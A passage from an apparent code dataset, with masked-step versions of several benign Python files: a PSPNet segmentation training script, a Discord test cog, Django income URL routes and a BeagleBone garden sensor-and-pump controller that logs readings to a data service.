exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-5": "# Author: BeiYu\n# Github: https://github.com/beiyuouo\n# Date : 2021/2/21 21:57\n# Description:\n\n__author__ = \"BeiYu\"\n\nfrom utils.init_env import set_seed\nfrom utils.options import *\n\nimport os\nimport logging\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom modules.seg_dataset import *\nfrom tqdm import tqdm\nimport click\nimport torch.nn.functional as F\nimport numpy as np\nfrom modules.seg import PSPNet\n\nmodels = {\n 'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet', n_classes=3),\n 'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet', n_classes=3),\n 'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18', n_classes=3),\n 'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=3),\n 'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50', n_classes=3),\n 'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101', n_classes=3),\n 'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152', n_classes=3)\n}\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n # net = nn.DataParallel(net)\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info(\"Snapshot for epoch {} loaded from {}\".format(epoch, snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu\n # net, starting_epoch = build_network(snapshot, backend)\n # data_path = os.path.abspath(os.path.expanduser(data_path))\n # models_path = os.path.abspath(os.path.expanduser(models_path))\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n\n '''\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n '''\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size, shuffle=True, num_workers=1)\n\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n # scheduler = MultiStepLR(optimizer, milestones=[int(x) for x in milestones.split(',')])\n\n print(\"start training...\")\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch+1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n\n out, out_cls = net(x)\n # print(x.shape, out.shape, out_cls.shape, y.shape, y_cls.shape)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i, len(traindata) // args.seg_batch_size,\n epoch + 1,\n loss.item())\n print(status)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f'{\"seg\"}_{args.seg_model}_{args.seg_backend}_{epoch}.pth'))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import discord
from discord.ext import commands
class TestCommands(commands.Cog, description="Unstable test commands", command_attrs=dict(hidden=True, description="Can only be used by an Owner")):
def __init__(self, bot):
self.bot = bot
self.hidden = True
print("Loaded", __name__)
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
def setup(bot):
if getattr(bot, "debug", False):
bot.add_cog(TestCommands(bot))
|
normal
|
{
"blob_id": "d5a5c6f9d483b2998cd0d9e47b37ab4499fa1c2a",
"index": 6279,
"step-1": "<mask token>\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n <mask token>\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print('Loaded', __name__)\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print('Loaded', __name__)\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\ndef setup(bot):\n if getattr(bot, 'debug', False):\n bot.add_cog(TestCommands(bot))\n",
"step-4": "import discord\nfrom discord.ext import commands\n\n\nclass TestCommands(commands.Cog, description='Unstable test commands',\n command_attrs=dict(hidden=True, description='Can only be used by an Owner')\n ):\n\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print('Loaded', __name__)\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\ndef setup(bot):\n if getattr(bot, 'debug', False):\n bot.add_cog(TestCommands(bot))\n",
"step-5": "import discord\nfrom discord.ext import commands\n\n\nclass TestCommands(commands.Cog, description=\"Unstable test commands\", command_attrs=dict(hidden=True, description=\"Can only be used by an Owner\")):\n def __init__(self, bot):\n self.bot = bot\n self.hidden = True\n print(\"Loaded\", __name__)\n\n\n async def cog_check(self, ctx):\n return await self.bot.is_owner(ctx.author)\n\n\ndef setup(bot):\n if getattr(bot, \"debug\", False):\n bot.add_cog(TestCommands(bot))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.urls import path,include
from Income import views
urlpatterns = [
path('IncomeHome/',views.IncomeHome,name='IncomeHome'),
path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),
path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),
path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),
path('Income/',views.IncomeView.as_view(),name='Income'),
]
|
normal
|
{
"blob_id": "ad3a7221883a847fc9d26097c3801973cbbda38e",
"index": 355,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-3": "from django.urls import path, include\nfrom Income import views\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-4": "\nfrom django.urls import path,include\n\nfrom Income import views\n\nurlpatterns = [\n path('IncomeHome/',views.IncomeHome,name='IncomeHome'),\n path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),\n path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),\n path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),\n path('Income/',views.IncomeView.as_view(),name='Income'),\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
__author__ = 'jjpr'
import pyrr
import barleycorn as bc
def test_xyz123():
cone_x = bc.primitives.Cone(1.0, 1.0)
|
normal
|
{
"blob_id": "e6af221f1d6397d0fc52671cdd27d43549d0aecb",
"index": 513,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n",
"step-3": "__author__ = 'jjpr'\n<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n",
"step-4": "__author__ = 'jjpr'\nimport pyrr\nimport barleycorn as bc\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# jan 2014 bbb garden shield attempt
# AKA
'''
Sensors:
analog level sensor, pin AIN0
TMP102 i2c temperature sensor, address 0x48
(if add0 is grounded) or 0x49 (if pulled up)
Outputs:
Analog RGB LED strip
I2C display(?)
Pump Activate/Deactivate (GPIO pin)
Some measurements as of mid-March 2014:
Tank can be pumped for 15 minutes without sun exposure to liquid.
Seems like after 10 minutes of pumping, the autosiphon engages, though.
Tank takes about 17 minutes to drain from a 15-minute pump
11 gals in reservoir reads as 0.42 on the adc.read scale from 0 to 1
8 gals in reservoir reads as 0.175 on the adc.read scale from 0 to 1
7 gals in reservoir reads as 0.15 on the adc.read scale from 0 to 1
'''
from __future__ import division
import Adafruit_SSD1306 as ssd
import Adafruit_BBIO.UART as uart
import Image
import ImageDraw
import ImageFont
# import Adafruit_GPIO.PWM as pwm
import Adafruit_BBIO.GPIO as gpio
import Adafruit_BBIO.ADC as adc
# import TMP102 as tmp102
import datetime
from dateutil.tz import tzlocal
import time
import serial
import atexit
from math import log
import requests
import key as k
import logging
BCOEFFICIENT = 3950 # thermistor beta coefficient
THERMISTORNOMINAL = 10000
TEMPERATURENOMINAL = 25.0
SERIESRESISTOR = 10000
# a1 = blue and white, which is bed temp
# a2 = white and orange, which is tank temp
interval = 60 # seconds between samples
greenPin = 'P8_13'
bluePin = 'P9_14'
redPin = 'P8_19'
servoPin = 'P9_16'
tankPin = 'P9_39'
photoPin = 'P9_38'
thermistor1 = 'P9_40' # AIN1, bed temp
thermistor2 = 'P9_37' # AIN2, reservoir temp
pumpPin = 'P8_10'
RST = 'P8_10' # OLED screen reset pin, not always necessary
readings = {}
PUMP_INTERVAL = 60 # minutes between pump actuations
PUMP_DURATION = 12 # minutes to run pump
def exit_handler():
print 'exiting'
gpio.output(pumpPin,gpio.LOW)
gpio.cleanup()
uart.cleanup()
def do_sensor_read():
print 'sensor read'
global readings
readings = {}
# value = ADC.read("AIN1")
# adc returns value from 0 to 1.
# use read_raw(pin) to get V values
# tank = adc.read(tankPin)
tank = adc.read(tankPin) # have to read twice due to bbio bug
print 'tank is %s' % tank
time.sleep(1)
# photo = adc.read(photoPin) # have to read twice due to bbio bug
photo = 1.0-adc.read(photoPin) # reverse range so that 0 is darkest
print 'photo is %s' % photo
time.sleep(1)
# temp1 = adc.read_raw(thermistor1)
temp1 = adc.read_raw(thermistor1)
time.sleep(1)
print 'temp1 raw %s' % temp1
temp1 = convert_thermistor_special(temp1)
readings['bedTemp'] = temp1
print 'converted bed_temp is %s' % temp1
# # do conversion per
# # http://learn.adafruit.com/thermistor/using-a-thermistor
# temp2 = adc.read_raw(thermistor2)
temp2 = adc.read_raw(thermistor2)
time.sleep(1)
print 'temp2 raw %s' % temp2
print temp2
temp2 = convert_thermistor(temp2)
readings['tankTemp'] = temp2
print 'converted reservoir_temp is %s' % temp2
# do conversion per
# http://learn.adafruit.com/thermistor/using-a-thermistor
# tmp36reading = adc.read_raw(tmp36Pin)
# tmp36reading = adc.read_raw(tmp36Pin) # have to read twice due to bbio bug
# millivolts = tmp36reading * 1800 # 1.8V reference = 1800 mV
# temp_c = (millivolts - 500) / 10
# print temp_c
# ph_val = get_ph()
# print 'ph_val was thoght to be %s' % ph_val
readings['tankLevel'] = tank # tank level
readings['photocell'] = photo # photocell
def convert_thermistor(raw):
# convert the value to resistance
# print 'was given %s' % raw
raw = SERIESRESISTOR/((1800.0/raw) - 1.0)
# raw = float(SERIESRESISTOR / float(raw))
print 'Thermistor resistance '
print raw
steinhart = raw/THERMISTORNOMINAL # (R/Ro)
steinhart = log(steinhart) # ln(R/Ro)
steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)
steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)
steinhart = float(1.0 / steinhart) # Invert
steinhart -= 273.15 # convert to C
print 'we think converted temperature is %s' % steinhart
return steinhart
def convert_thermistor_special(raw):
# convert the value to resistance
# print 'was given %s' % raw
# raw = (1800/raw) - 1
# fuck me, a1 is only up against 3.73kOhm - even though it's a properly-labeled resistor!
raw = 3730.0/((1800.0/raw) - 1.0)
print 'Thermistor resistance '
print raw
steinhart = raw/THERMISTORNOMINAL # (R/Ro)
steinhart = log(steinhart) # ln(R/Ro)
steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)
steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)
steinhart = float(1.0 / steinhart) # Invert
steinhart -= 273.15 # convert to C
print 'we think converted temperature is %s' % steinhart
return steinhart
def do_db_update():
print 'db update'
global readings
# print readings
if len(readings) != 0:
# data.sparkfun.com is expecting:
# bedTemp, photo, tankLevel, tankTemp
bedTemp = float('{0:.2f}'.format(readings['bedTemp']))
tankTemp = float('{0:.2f}'.format(readings['tankTemp']))
payload = {
'photo':readings['photocell'],
'tankLevel':readings['tankLevel'],
'bedTemp':readings['bedTemp'],
'tankTemp':readings['tankTemp']
}
h = {'Phant-Private-Key':k.key['phant_private']}
r = requests.post(k.key['phant_url'], data=payload, headers=h)
print 'wrote a result set to the DB'
else:
print 'NULL readings, nothing written to DB'
def get_ph():
print 'we are in get_ph'
uart.setup('UART2')
ser = serial.Serial(port = '/dev/ttyO2', baudrate=38400)
print 'opened serial port'
ser.open()
ser.write('R\r')
data = ser.read()
print 'ph received raw as %s' % data
ser.close()
uart.cleanup()
return data
def do_state_display():
print 'state_display'
width = disp.width
height = disp.height
image = Image.new('1', (width, height))
# Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
# Load default font.
# font = ImageFont.load_default()
# Alternatively load a TTF font.
# Some other nice fonts to try: http://www.dafont.com/bitmap.php
font = ImageFont.truetype('Vdj.ttf', 8)
# Draw a black filled box to clear the image.
draw.rectangle((0,0,width,height), outline=0, fill=0)
# Draw some shapes.
# First define some constants to allow easy resizing of shapes.
padding = 2
shape_width = 20
top = padding
bottom = height-padding
# Move left to right keeping track of the current x position for drawing shapes.
x = padding
draw.text((x, top), 'photo: ', font=font, fill=255)
draw.text((x, top+16), 'tankLevel: ', font=font, fill=255)
draw.text((x, top+32), 'tankTemp: ', font=font, fill=255)
draw.text((x, top+48), 'bedTemp: ', font=font, fill=255)
draw.text((x+64, top), str(readings['photocell'])[:4], font=font, fill=255)
draw.text((x+64, top+16), str(readings['tankLevel'])[:4], font=font, fill=255)
draw.text((x+64, top+32), str(readings['tankTemp'])[:4], font=font, fill=255)
draw.text((x+64, top+48), str(readings['bedTemp'])[:4], font=font, fill=255)
# Draw an ellipse.
# draw.ellipse((x, top , x+shape_width, bottom), outline=255, fill=0)
# x += shape_width+padding
# Draw a rectangle.
# draw.rectangle((x, top, x+shape_width, bottom), outline=255, fill=0)
# x += shape_width+padding
# Draw a triangle.
# draw.polygon([(x, bottom), (x+shape_width/2, top), (x+shape_width, bottom)], outline=255, fill=0)
# x += shape_width+padding
# Draw an X.
# draw.line((x, bottom, x+shape_width, top), fill=255)
# draw.line((x, top, x+shape_width, bottom), fill=255)
# x += shape_width+padding
# Display image.
disp.image(image)
disp.display()
# so, what will state display be?
# I2C display of tank temp?
def do_pump_toggle():
print 'pump actuate'
'''
this should actually work like:
if currentMinute mod PUMP_DURATION < PUMP_INTERVAL:
activate pump
else:
turn off pump
'''
if (datetime.datetime.today().hour>6 and datetime.datetime.today().hour<23):
print 'within actuating timeframe'
# changed this to just pump for the first PUMP_DURATION minutes every hour
if(datetime.datetime.today().minute <= PUMP_DURATION):
print 'we are in the first %s minutes of the hour, so pump should be on.' % PUMP_DURATION
gpio.output(pumpPin,gpio.HIGH)
else:
print 'shutting off pump at %s' % datetime.datetime.today().minute
gpio.output(pumpPin,gpio.LOW)
else:
print 'it is the actuator quiet period, between 11pm and 6am'
gpio.output(pumpPin,gpio.LOW)
print 'starting sampling at'
print datetime.datetime.now(tzlocal())
logging.basicConfig(filename='example.log',level=logging.DEBUG)
# adc.setup(thermistor1)
# adc.setup(thermistor2)
# adc.setup(photoPin)
adc.setup()
# uart.setup('UART2')
# print 'uart setup'
gpio.setup(pumpPin,gpio.OUT)
# t = tmp102.TMP102()
disp = ssd.SSD1306_128_64(rst=RST,i2c_address=0x3D)
disp.begin()
disp.clear()
disp.display()
# NOTE
# There is currently a bug in the ADC driver.
# You'll need to read the values twice
# in order to get the latest value.
# pwm.start(greenPin, 10.0, 2000.0)
# pwm.start(redPin, 10.0, 2000.0)
# pwm.start(bluePin, 10.0, 2000.0)
atexit.register(exit_handler)
while True:
try:
do_sensor_read()
except Exception, e:
print e
print 'sensor_read error!'
try:
do_db_update()
except Exception, e:
print e
print 'do_db_update error!'
try:
do_state_display()
# pass
except Exception, e:
print e
print 'do_state_display error!'
try:
do_pump_toggle()
except Exception, e:
print e
print 'do_pump_toggle error!'
print 'done with cycle, now waiting %s' % datetime.datetime.today()
time.sleep(interval)
|
normal
|
{
"blob_id": "06992263599fe3290c87ec00c6cb8af3748920c8",
"index": 5497,
"step-1": "\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# jan 2014 bbb garden shield attempt\n# AKA\n\n'''\nSensors:\nanalog level sensor, pin AIN0\nTMP102 i2c temperature sensor, address 0x48\n(if add0 is grounded) or 0x49 (if pulled up)\n\n\nOutputs:\nAnalog RGB LED strip\nI2C display(?)\nPump Activate/Deactivate (GPIO pin)\n\nSome measurements as of mid-March 2014:\n\nTank can be pumped for 15 minutes without sun exposure to liquid.\nSeems like after 10 minutes of pumping, the autosiphon engages, though.\nTank takes about 17 minutes to drain from a 15-minute pump\n\n11 gals in reservoir reads as 0.42 on the adc.read scale from 0 to 1\n8 gals in reservoir reads as 0.175 on the adc.read scale from 0 to 1\n7 gals in reservoir reads as 0.15 on the adc.read scale from 0 to 1\n'''\nfrom __future__ import division\nimport Adafruit_SSD1306 as ssd\nimport Adafruit_BBIO.UART as uart\nimport Image\nimport ImageDraw\nimport ImageFont\n# import Adafruit_GPIO.PWM as pwm\nimport Adafruit_BBIO.GPIO as gpio\nimport Adafruit_BBIO.ADC as adc\n# import TMP102 as tmp102\nimport datetime\nfrom dateutil.tz import tzlocal\nimport time\nimport serial\nimport atexit\nfrom math import log\nimport requests\nimport key as k\nimport logging\n\nBCOEFFICIENT = 3950 # thermistor beta coefficient\nTHERMISTORNOMINAL = 10000\nTEMPERATURENOMINAL = 25.0\nSERIESRESISTOR = 10000\n# a1 = blue and white, which is bed temp\n# a2 = white and orange, which is tank temp\ninterval = 60 # seconds between samples\ngreenPin = 'P8_13'\nbluePin = 'P9_14'\nredPin = 'P8_19'\nservoPin = 'P9_16'\ntankPin = 'P9_39'\nphotoPin = 'P9_38'\nthermistor1 = 'P9_40' # AIN1, bed temp\nthermistor2 = 'P9_37' # AIN2, reservoir temp\npumpPin = 'P8_10'\nRST = 'P8_10' # OLED screen reset pin, not always necessary\nreadings = {}\nPUMP_INTERVAL = 60 # minutes between pump actuations\nPUMP_DURATION = 12 # minutes to run pump\n\ndef exit_handler():\n print 'exiting'\n gpio.output(pumpPin,gpio.LOW)\n gpio.cleanup()\n uart.cleanup()\n\ndef do_sensor_read():\n print 'sensor read'\n global readings\n readings = {}\n # value = ADC.read(\"AIN1\")\n # adc returns value from 0 to 1.\n # use read_raw(pin) to get V values\n # tank = adc.read(tankPin)\n tank = adc.read(tankPin) # have to read twice due to bbio bug\n print 'tank is %s' % tank\n time.sleep(1)\n \n \n # photo = adc.read(photoPin) # have to read twice due to bbio bug\n photo = 1.0-adc.read(photoPin) # reverse range so that 0 is darkest\n print 'photo is %s' % photo\n time.sleep(1)\n \n\n # temp1 = adc.read_raw(thermistor1)\n temp1 = adc.read_raw(thermistor1)\n time.sleep(1)\n print 'temp1 raw %s' % temp1\n temp1 = convert_thermistor_special(temp1)\n readings['bedTemp'] = temp1\n print 'converted bed_temp is %s' % temp1\n \n # # do conversion per\n # # http://learn.adafruit.com/thermistor/using-a-thermistor\n\n # temp2 = adc.read_raw(thermistor2)\n temp2 = adc.read_raw(thermistor2)\n time.sleep(1)\n print 'temp2 raw %s' % temp2\n print temp2\n temp2 = convert_thermistor(temp2)\n readings['tankTemp'] = temp2\n print 'converted reservoir_temp is %s' % temp2\n\n # do conversion per\n # http://learn.adafruit.com/thermistor/using-a-thermistor\n # tmp36reading = adc.read_raw(tmp36Pin)\n # tmp36reading = adc.read_raw(tmp36Pin) # have to read twice due to bbio bug\n # millivolts = tmp36reading * 1800 # 1.8V reference = 1800 mV\n # temp_c = (millivolts - 500) / 10\n # print temp_c\n\n # ph_val = get_ph()\n # print 'ph_val was thoght to be %s' % ph_val\n\n readings['tankLevel'] = tank # tank level\n readings['photocell'] = photo # photocell\n\ndef convert_thermistor(raw):\n # convert the value to resistance\n # print 'was given %s' % raw\n raw = SERIESRESISTOR/((1800.0/raw) - 1.0)\n # raw = float(SERIESRESISTOR / float(raw))\n print 'Thermistor resistance ' \n print raw\n steinhart = raw/THERMISTORNOMINAL # (R/Ro)\n steinhart = log(steinhart) # ln(R/Ro)\n steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)\n steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)\n steinhart = float(1.0 / steinhart) # Invert\n steinhart -= 273.15 # convert to C\n print 'we think converted temperature is %s' % steinhart\n return steinhart\n\ndef convert_thermistor_special(raw):\n # convert the value to resistance\n # print 'was given %s' % raw\n # raw = (1800/raw) - 1\n # fuck me, a1 is only up against 3.73kOhm - even though it's a properly-labeled resistor!\n raw = 3730.0/((1800.0/raw) - 1.0)\n print 'Thermistor resistance ' \n print raw\n steinhart = raw/THERMISTORNOMINAL # (R/Ro)\n steinhart = log(steinhart) # ln(R/Ro)\n steinhart /= BCOEFFICIENT # 1/B * ln(R/Ro)\n steinhart += float(1.0 / (TEMPERATURENOMINAL + 273.15)) # + (1/To)\n steinhart = float(1.0 / steinhart) # Invert\n steinhart -= 273.15 # convert to C\n print 'we think converted temperature is %s' % steinhart\n return steinhart\n\ndef do_db_update():\n print 'db update'\n global readings\n # print readings\n if len(readings) != 0:\n # data.sparkfun.com is expecting:\n # bedTemp, photo, tankLevel, tankTemp\n bedTemp = float('{0:.2f}'.format(readings['bedTemp']))\n tankTemp = float('{0:.2f}'.format(readings['tankTemp']))\n payload = {\n 'photo':readings['photocell'],\n 'tankLevel':readings['tankLevel'],\n 'bedTemp':readings['bedTemp'],\n 'tankTemp':readings['tankTemp']\n }\n h = {'Phant-Private-Key':k.key['phant_private']}\n r = requests.post(k.key['phant_url'], data=payload, headers=h)\n print 'wrote a result set to the DB'\n else:\n print 'NULL readings, nothing written to DB'\n\ndef get_ph():\n print 'we are in get_ph'\n uart.setup('UART2')\n ser = serial.Serial(port = '/dev/ttyO2', baudrate=38400)\n print 'opened serial port'\n ser.open()\n ser.write('R\\r')\n data = ser.read()\n print 'ph received raw as %s' % data\n ser.close()\n uart.cleanup()\n return data\n\ndef do_state_display():\n print 'state_display'\n width = disp.width\n height = disp.height\n image = Image.new('1', (width, height))\n\n # Get drawing object to draw on image.\n draw = ImageDraw.Draw(image)\n # Load default font.\n # font = ImageFont.load_default()\n # Alternatively load a TTF font.\n # Some other nice fonts to try: http://www.dafont.com/bitmap.php\n font = ImageFont.truetype('Vdj.ttf', 8)\n # Draw a black filled box to clear the image.\n draw.rectangle((0,0,width,height), outline=0, fill=0)\n\n # Draw some shapes.\n # First define some constants to allow easy resizing of shapes.\n padding = 2\n shape_width = 20\n top = padding\n bottom = height-padding\n\n # Move left to right keeping track of the current x position for drawing shapes.\n x = padding\n\n draw.text((x, top), 'photo: ', font=font, fill=255)\n draw.text((x, top+16), 'tankLevel: ', font=font, fill=255)\n draw.text((x, top+32), 'tankTemp: ', font=font, fill=255)\n draw.text((x, top+48), 'bedTemp: ', font=font, fill=255)\n draw.text((x+64, top), str(readings['photocell'])[:4], font=font, fill=255)\n draw.text((x+64, top+16), str(readings['tankLevel'])[:4], font=font, fill=255)\n draw.text((x+64, top+32), str(readings['tankTemp'])[:4], font=font, fill=255) \n draw.text((x+64, top+48), str(readings['bedTemp'])[:4], font=font, fill=255)\n \n # Draw an ellipse.\n # draw.ellipse((x, top , x+shape_width, bottom), outline=255, fill=0)\n # x += shape_width+padding\n # Draw a rectangle.\n # draw.rectangle((x, top, x+shape_width, bottom), outline=255, fill=0)\n # x += shape_width+padding\n # Draw a triangle.\n # draw.polygon([(x, bottom), (x+shape_width/2, top), (x+shape_width, bottom)], outline=255, fill=0)\n # x += shape_width+padding\n # Draw an X.\n # draw.line((x, bottom, x+shape_width, top), fill=255)\n # draw.line((x, top, x+shape_width, bottom), fill=255)\n # x += shape_width+padding\n \n # Display image.\n disp.image(image)\n disp.display()\n # so, what will state display be?\n # I2C display of tank temp?\n\ndef do_pump_toggle():\n print 'pump actuate'\n '''\n this should actually work like:\n if currentMinute mod PUMP_DURATION < PUMP_INTERVAL:\n activate pump\n else:\n turn off pump\n '''\n if (datetime.datetime.today().hour>6 and datetime.datetime.today().hour<23):\n print 'within actuating timeframe'\n # changed this to just pump for the first PUMP_DURATION minutes every hour\n if(datetime.datetime.today().minute <= PUMP_DURATION):\n print 'we are in the first %s minutes of the hour, so pump should be on.' % PUMP_DURATION\n gpio.output(pumpPin,gpio.HIGH)\n else:\n print 'shutting off pump at %s' % datetime.datetime.today().minute\n gpio.output(pumpPin,gpio.LOW)\n else:\n print 'it is the actuator quiet period, between 11pm and 6am'\n gpio.output(pumpPin,gpio.LOW)\n\nprint 'starting sampling at'\nprint datetime.datetime.now(tzlocal())\nlogging.basicConfig(filename='example.log',level=logging.DEBUG)\n# adc.setup(thermistor1)\n# adc.setup(thermistor2)\n# adc.setup(photoPin)\nadc.setup()\n# uart.setup('UART2')\n# print 'uart setup'\ngpio.setup(pumpPin,gpio.OUT)\n# t = tmp102.TMP102()\ndisp = ssd.SSD1306_128_64(rst=RST,i2c_address=0x3D)\ndisp.begin()\ndisp.clear()\ndisp.display()\n# NOTE\n# There is currently a bug in the ADC driver.\n# You'll need to read the values twice\n# in order to get the latest value.\n# pwm.start(greenPin, 10.0, 2000.0)\n# pwm.start(redPin, 10.0, 2000.0)\n# pwm.start(bluePin, 10.0, 2000.0)\natexit.register(exit_handler)\n\nwhile True:\n try:\n do_sensor_read()\n except Exception, e:\n print e\n print 'sensor_read error!'\n try:\n do_db_update()\n except Exception, e:\n print e\n print 'do_db_update error!'\n try:\n do_state_display()\n # pass\n except Exception, e:\n print e\n print 